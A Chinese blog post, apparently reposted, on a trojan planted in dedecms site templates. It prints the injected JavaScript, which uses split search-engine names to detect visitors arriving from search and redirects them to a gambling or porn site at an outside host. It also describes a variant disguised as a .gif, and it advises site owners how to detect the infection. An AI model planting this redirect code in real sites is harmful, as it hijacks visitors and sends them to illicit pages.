您的位置:首页 > 其它

dede最新漏洞以及黑客木马特征

2016-03-21 10:51 225 查看

dede最新漏洞以及黑客木马特征

时间:2013-08-04 12:48来源:疯子工作室 作者:疯子 点击: 次据疯子工作室统计,截止到今天,依旧有大约3万个使用dedecms管理系统程序开发的网站被黑客挂马。
Dedecms后台系统程序升级到5.7 sp1版本之后,依旧存在很多漏洞。具体的情况,也是在最近一段时间彻底暴漏出来。据疯子工作室统计,截止到今天,依旧有大约3万个使用dedecms管理系统程序开发的网站被黑客挂马。目前,dedecms官网没有给予任何答复以及解决方案。另外,对于国内公认最具权威的360网站安全监测,很失望的是一直曝正常。这次针对于DEDE程序的木马,主要被运用于博彩以及色情行业相关网站做跳转。从中我们也看出一个问题,曾经被公认为正义之士的黑客良莠不济,多数还是以损害个人利益来谋取利润。

这次木马爆发的特征整体来说,黑客很聪明的判断网站首页、内容页的来源,对于来自百度等搜索引擎的人,强制跳转到不良网站。随着信息化的推进,黑客的技术不再局限于某个行业,相对而言,搜索引擎这个大市场,他们是不会放弃的。

木马的第一波特征:在你网站模板</head>后面会有一个{dede.dinfo}或者{dede:dsv}的自定义标签源码,第一波里面这个自定义标签里面的内容是一个js。

GID89a="";var s=document.referrer;var str=window.location.href;if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )window.location.href="http://d.d8d.pw/images/a2.asp?cpy="+str+"&kecy="+s;
通过这写代码,我们不能看出一些我们所熟悉的身影。window.location.href,google,baidu,yahoo,sogou,bing,360,soso,youdao,而index就是我们在百度搜索引擎的索引项。



第二点变异木马特征是,位置相同,使用了编码过后的网址、和伪装成gif的js代码:
类似于在</head>后,会有一个<script href="%ds%wdd%dd/33.gif">,这个gif实际上是上面脚本修改后缀的结果。



这个代码文章挂马特征的源代码是通过右键看不出来的,我们需要借助一些工具,比如chinaz站长工具中查询网站源码功能,具体可以通过http://tool.chinaz.com/Tools/PageCode.aspx查询自己网站是否被挂了黑链。
注:本文由疯子工作室[/b]原创,转载请注明原文网址:http://www.madseo.net/topics/6.html
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航